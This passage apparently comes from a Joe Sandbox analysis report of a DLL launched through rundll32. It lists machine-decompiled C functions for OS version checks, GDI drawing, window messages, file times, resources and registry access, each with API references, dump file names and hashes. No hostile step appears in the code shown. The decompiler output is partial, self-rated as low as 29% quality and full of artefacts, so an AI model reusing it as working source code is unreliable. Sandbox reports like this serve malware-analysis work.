						GlobalUnlock( *_t96);
						_t96[2] = _t96[2] & 0x00000000;
						_t74 = 1;
					} else {
						_t74 = 0;
					}
				} else {
					_t74 = 0;
				}
				return E100117AE(_t74, _v8);
			}

APIs

GlobalLock.KERNEL32 ref: 1002485C
lstrlenA.KERNEL32(?), ref: 100248A0

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: GlobalLocklstrlen
String ID:
API String ID: 1144527523-0
Opcode ID: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
Instruction ID: afb049e80b1b3f5565d5b3658fd79ee3861b352aa931f7b78d6a2774fdc8a605
Opcode Fuzzy Hash: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
Instruction Fuzzy Hash: 9341B632900219EFDB14DFB4D88589EBBB8FF44354B518229E815DB255EF70E995CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1001119B Relevance: 6.1, APIs: 4, Instructions: 113
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E1001119B(void* __ebx, void* __ecx, void* __edi, long* _a8) {
				void* _v8;
				void* __esi;
				void* __ebp;
				long* _t9;
				long* _t11;
				long _t17;
				signed int _t25;
				long* _t33;
				long* _t36;
				long* _t38;
				long* _t39;
				long _t47;
				long _t50;
				void* _t52;
				long* _t53;
				struct _OSVERSIONINFOA* _t54;
				signed int _t56;
				struct _OSVERSIONINFOA* _t58;

				_t9 = _a8;
				if(_t9 != 1) {
					__eflags = _t9;
					if(_t9 != 0) {
						__eflags = _t9 - 2;
						if(__eflags != 0) {
							__eflags = _t9 - 3;
							if(_t9 == 3) {
								E10015355(0);
							}
							L27:
							_t11 = 1;
							__eflags = 1;
							L28:
							return _t11;
						}
						_push(0x8c);
						_push(1);
						_t53 = E1001382A(__ebx, __edi, _t52, __eflags);
						__eflags = _t53;
						if(_t53 == 0) {
							L24:
							_t11 = 0;
							goto L28;
						}
						__eflags =  *0x1004f5e4( *0x1004c848, _t53);
						_push(_t53);
						if(__eflags == 0) {
							E100107C8(__ebx, __edi, _t53, __eflags);
							goto L24;
						}
						E1001518A();
						_t17 = GetCurrentThreadId();
						_t53[1] = _t53[1] | 0xffffffff;
						 *_t53 = _t17;
						goto L27;
					}
					__eflags =  *0x1004f3c8 - _t9; // 0x0
					if(__eflags <= 0) {
						goto L24;
					}
					 *0x1004f3c8 =  *0x1004f3c8 - 1;
					__eflags =  *0x1004f41c - _t9; // 0x1
					if(__eflags == 0) {
						E10011F67();
					}
					E1001634A();
					E1001516D();
					E10013AD4();
					goto L27;
				}
				E10010B20(0x94, __ecx);
				_t54 = _t58;
				_t54->dwOSVersionInfoSize = 0x94;
				if(GetVersionExA(_t54) == 0) {
					goto L24;
				}
				_t47 = _t54->dwPlatformId;
				 *0x1004f3e0 = _t47;
				_t25 = _t54->dwMajorVersion;
				 *0x1004f3ec = _t25;
				_t50 = _t54->dwMinorVersion;
				 *0x1004f3f0 = _t50;
				_t56 = _t54->dwBuildNumber & 0x00007fff;
				 *0x1004f3e4 = _t56;
				if(_t47 != 2) {
					 *0x1004f3e4 = _t56 | 0x00008000;
				}
				 *0x1004f3e8 = (_t25 << 8) + _t50;
				if(E10013A83(1) != 0) {
					if(E10015384() != 0) {
						E1001678D(__eflags);
						 *0x10050cb0 = GetCommandLineA();
						 *0x1004f3cc = E1001666B();
						_t33 = E1001614C();
						__eflags = _t33;
						if(_t33 < 0) {
							L13:
							E1001516D();
							goto L6;
						}
						_t36 = E100165C9();
						__eflags = _t36;
						if(_t36 < 0) {
							L12:
							E1001634A();
							goto L13;
						}
						_t38 = E10016396();
						__eflags = _t38;
						if(_t38 < 0) {
							goto L12;
						}
						_t39 = E10011E29(0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L12;
						}
						 *0x1004f3c8 =  *0x1004f3c8 + 1;
						goto L27;
					}
					L6:
					E10013AD4();
				}
			}

APIs

GetVersionExA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100111BE
GetCommandLineA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10011238

Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
Part of subcall function 1001666B: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C

Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC

FlsSetValue.KERNEL32(00000000,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100112DB
GetCurrentThreadId.KERNEL32 ref: 100112EC

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
String ID:
API String ID: 770256606-0
Opcode ID: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
Instruction ID: a119cf37508875902a7ac88b5959fce435ef45eee062e48075b7e26cf38889a7
Opcode Fuzzy Hash: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
Instruction Fuzzy Hash: 7D31F635904312DBF728DFB08D8669A77E4EF05792F10412EF860CE552EB30EAC08B61

Uniqueness

Uniqueness Score: -1.00%

Function 10030582 Relevance: 6.1, APIs: 4, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10030582(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __esi;
				void* __ebp;
				signed char _t60;
				signed char _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				intOrPtr _t83;
				void* _t91;

				_t91 = __eflags;
				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_push(GetStockObject(0));
				_t83 = E1002934F();
				_v16 = _t83;
				_v8 = E10033F2F(_t83, _t91);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t83;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00000050;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00000050;
							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x75) & 0x000000f0) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t95 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E10033FCE( *((intOrPtr*)(_t76 + 0x84)), _t95,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}

APIs

GetStockObject.GDI32(00000000), ref: 10030598

Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C

InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
String ID:
API String ID: 3923860780-0
Opcode ID: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
Instruction ID: 9af8668bb33911b9f969ea6b6b6f254ec0c1e141af5f513437efede38b15d734
Opcode Fuzzy Hash: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
Instruction Fuzzy Hash: BF410371D016199FDF42CFA4C980A9EBBF5EB48351F1142A5E911AB29AD370AE41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002084F Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1002084F(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001E0CB( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E10006D96( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E10006D96( &_a4)));
								_v8 =  *((intOrPtr*)(E10006D96( &_a4)));
								if((E1002049B(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E10006DAF( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E10006DAF( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1002049B(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

APIs

SendMessageA.USER32 ref: 10020883
SendMessageA.USER32 ref: 100208E8
SendMessageA.USER32 ref: 1002092D
SendMessageA.USER32 ref: 10020956

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
Instruction ID: 409e1e54ae5c96ed2e58890ddbbbae16c890d09ac2c6be6a3a2fbe05691f9f0c
Opcode Fuzzy Hash: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
Instruction Fuzzy Hash: 29315C30A00219EFDB15DF55D890EAE3BAAEF45390F50806AF54A9B213DA71ED80DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10026B4F Relevance: 6.1, APIs: 4, Instructions: 103
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10026B4F(void* __ecx, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* _t43;
				long _t48;
				signed int* _t51;
				signed int* _t54;
				signed int* _t57;
				struct _FILETIME* _t67;
				void* _t81;
				CHAR* _t82;
				signed int* _t83;
				void* _t86;

				_t83 = _a4;
				_t81 = __ecx;
				E10011C50(_t83, 0, 0x128);
				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
				_t43 =  *(_t81 + 4);
				_t86 = _t43 -  *0x100401d4; // 0xffffffff
				if(_t86 == 0) {
					L12:
					return 1;
				}
				_t67 =  &_v12;
				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
					L4:
					return 0;
				}
				_t48 = GetFileSize( *(_t81 + 4), 0);
				_t83[6] = _t48;
				_t83[7] = 0;
				if(_t48 != 0xffffffff || 0 != 0) {
					_t82 =  *(_t81 + 0xc);
					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
					} else {
						_t83[8] = 0;
					}
					_t51 = E10010239(0,  &_v36, _t82,  &_v12, 0xffffffff);
					 *_t83 =  *_t51;
					_t83[1] = _t51[1];
					_t54 = E10010239(0,  &_v36, _t82,  &_v20, 0xffffffff);
					_t83[4] =  *_t54;
					_t83[5] = _t54[1];
					_t57 = E10010239(0,  &_v36, _t82,  &_v28, 0xffffffff);
					_t83[2] =  *_t57;
					_t83[3] = _t57[1];
					if(( *_t83 | _t83[1]) == 0) {
						 *_t83 =  *_t57;
						_t83[1] = _t57[1];
					}
					if((_t83[4] | _t83[5]) == 0) {
						_t83[4] = _t83[2];
						_t83[5] = _t83[3];
					}
					goto L12;
				} else {
					goto L4;
				}
			}

APIs

lstrcpynA.KERNEL32(?,?,00000104), ref: 10026B7A
GetFileTime.KERNEL32(?,?,?,?), ref: 10026B9C
GetFileSize.KERNEL32(?,00000000), ref: 10026BAA
GetFileAttributesA.KERNEL32(?), ref: 10026BD4

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID:
API String ID: 1499663573-0
Opcode ID: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
Instruction ID: a18b0f555d231170b7735eacb595d982f5b9ad02e146dd108c4f4c0e1a6c5240
Opcode Fuzzy Hash: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
Instruction Fuzzy Hash: 06419CB56006059FC724DFA4DD84CAABBF8FF093103508A2EE1A6D76A0E730F944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000C29A Relevance: 6.1, APIs: 4, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E1000C29A(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t71;

				_t71 = _a4 + 0xffffff2c;
				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
					return 0;
				}
				_t58 = _a8;
				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
					L4:
					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
						__imp__#9(_t71 + 0xa8);
						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
						_push( &_a4);
						_push(0x10043098);
						_a4 = 0;
						_push(_t41);
						if( *((intOrPtr*)( *_t41))() >= 0) {
							E10011C50( &_v56, 0, 0x20);
							E10011C50( &_v24, 0, 0x10);
							_t47 = _a4;
							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x10043018, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
							_t60 = __imp__#6;
							_a8 = _t48;
							if(_v52 != 0) {
								 *_t60(_v52);
							}
							if(_v48 != 0) {
								 *_t60(_v48);
							}
							if(_v44 != 0) {
								 *_t60(_v44);
							}
							_t49 = _a4;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
							}
						}
					}
					_t39 = 0;
					goto L15;
				} else {
					_v60 = 2;
					_v56 = _t58;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					E1000A823(_t71,  &_v60);
					_t39 = _v36;
					if(_t39 != 0) {
						L15:
						return _t39;
					}
					goto L4;
				}
			}

APIs

VariantClear.OLEAUT32(?), ref: 1000C30D
SysFreeString.OLEAUT32(?), ref: 1000C37C
SysFreeString.OLEAUT32(?), ref: 1000C386
SysFreeString.OLEAUT32(?), ref: 1000C390

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FreeString$ClearVariant
String ID:
API String ID: 3349467263-0
Opcode ID: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
Instruction ID: 552477abdee19e13ea1b462c0c8e49e77f6f834a68e9ea303e894a8b6247ec6d
Opcode Fuzzy Hash: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
Instruction Fuzzy Hash: E3310571A10229BFDB04DFA5C884EDEBBB9FF08790F10811AF559A6245C770AA54CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 10036A6D Relevance: 6.1, APIs: 4, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E10036A6D(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t22;
				signed short _t23;
				void* _t24;
				signed int _t29;
				signed short _t31;
				void* _t37;
				signed short _t38;
				signed short* _t47;
				void* _t53;
				struct HINSTANCE__* _t56;
				void* _t58;

				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				_t56 =  *(E100373B5() + 0xc);
				_t22 = FindResourceA(_t56, _a4, 0xf1);
				if(_t22 == 0) {
					L3:
					_t23 = 0;
				} else {
					_t24 = LoadResource(_t56, _t22);
					_v12 = _t24;
					if(_t24 == 0) {
						goto L3;
					} else {
						_t58 = LockResource(_t24);
						if(_t58 != 0) {
							_push(_t37);
							_t53 = E1001F77E(( *(_t58 + 6) & 0x0000ffff) << 2);
							_t29 = 0;
							__eflags =  *(_t58 + 6);
							if( *(_t58 + 6) > 0) {
								_t7 = _t58 + 8; // 0x8
								_t47 = _t7;
								do {
									 *(_t53 + _t29 * 4) =  *_t47 & 0x0000ffff;
									_t29 = _t29 + 1;
									_t47 =  &(_t47[1]);
									__eflags = _t29 - ( *(_t58 + 6) & 0x0000ffff);
								} while (_t29 < ( *(_t58 + 6) & 0x0000ffff));
							}
							_t31 = E100366B1(_t37, _v8, _t53, _t58, _t53,  *(_t58 + 6) & 0x0000ffff);
							_push(_t53);
							_t38 = _t31;
							L1001F7A9(_t38, _t53, _t58, __eflags);
							__eflags = _t38;
							if(_t38 != 0) {
								_t44 =  *(_t58 + 4) & 0x0000ffff;
								E100368F3(_v8, ( *(_t58 + 2) & 0x0000ffff) + 7, ( *(_t58 + 4) & 0x0000ffff) + 7,  *(_t58 + 2) & 0x0000ffff, _t44);
								_t38 = E1003697A(_v8, _a4);
							}
							FreeResource(_v12);
							_t23 = _t38;
						} else {
							goto L3;
						}
					}
				}
				return _t23;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F1), ref: 10036A87
LoadResource.KERNEL32(?,00000000), ref: 10036A93
LockResource.KERNEL32(00000000), ref: 10036AA1
FreeResource.KERNEL32(?), ref: 10036B24

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
Instruction ID: 90f7a23fa8f058c3dd6ac9528b305ebca7cc9ac8441aa778f718171523645421
Opcode Fuzzy Hash: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
Instruction Fuzzy Hash: 6321B375500621AED716DFA1CC84CBBB7ECEF48642B00C429F946DB251EB30ED41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002C73E Relevance: 6.1, APIs: 4, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1002C73E(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				struct tagRECT _v32;
				struct HDC__* _v44;
				char _v52;
				struct tagTEXTMETRICA _v108;
				void* __ebp;
				long _t25;
				int _t35;
				intOrPtr* _t40;
				void* _t43;
				intOrPtr _t53;
				intOrPtr* _t59;
				intOrPtr _t60;

				_t59 = __ecx;
				_push(0);
				E100290F7( &_v52);
				_t25 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
				_t43 = 0;
				if(_t25 != 0) {
					_t43 = E1000866D( &_v52, _t25);
				}
				GetTextMetricsA(_v44,  &_v108);
				_t62 = _t43;
				if(_t43 != 0) {
					E1000866D( &_v52, _t43);
				}
				E10029152( &_v52, _t62);
				SetRectEmpty( &_v32);
				 *((intOrPtr*)( *_t59 + 0x13c))( &_v32, _a12);
				 *((intOrPtr*)( *_t59 + 0x110))(0x407, 0,  &_v16);
				_t35 = GetSystemMetrics(6);
				_t60 =  *((intOrPtr*)(_t59 + 0x90));
				_t53 = (_t35 + _v12 << 1) - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
				if(_t53 < _t60) {
					_t53 = _t60;
				}
				_t40 = _a4;
				 *_t40 = 0x7fff;
				 *((intOrPtr*)(_t40 + 4)) = _t53;
				return _t40;
			}

APIs

Part of subcall function 100290F7: __EH_prolog.LIBCMT ref: 100290FC
Part of subcall function 100290F7: GetDC.USER32(00000000), ref: 1002912A

SendMessageA.USER32 ref: 1002C75B
GetTextMetricsA.GDI32(?,?), ref: 1002C779
SetRectEmpty.USER32(?), ref: 1002C798
GetSystemMetrics.USER32 ref: 1002C7D0

Part of subcall function 1000866D: SelectObject.GDI32(?,?), ref: 1000867C

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Metrics$EmptyH_prologMessageObjectRectSelectSendSystemText
String ID:
API String ID: 1847300772-0
Opcode ID: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
Instruction ID: 7e47f88f2f58757794e6d6d0f1f8ec1525fff8c624cfc69816e05b16ce6d54a2
Opcode Fuzzy Hash: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
Instruction Fuzzy Hash: 67217936A00218AFDB15DFA8DC89CEEBBB9FF88700F414529F512A7291DB717945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10034B35 Relevance: 6.1, APIs: 4, Instructions: 71
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10034B35(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				char* _t32;
				intOrPtr _t34;
				char** _t35;
				signed int _t40;
				char** _t44;
				char* _t46;

				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				_t46 =  *0x1004b390; // 0x1003d660
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t35 = 0x1004b390;
				if(_t46 == 0) {
					L13:
					RegCloseKey(0);
					return 1;
				}
				do {
					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
						goto L11;
					}
					_t8 =  &(_t35[1]); // 0x1004b358
					_t44 =  *_t8;
					while(1) {
						_t32 =  *_t44;
						if(_t32 == 0) {
							goto L11;
						}
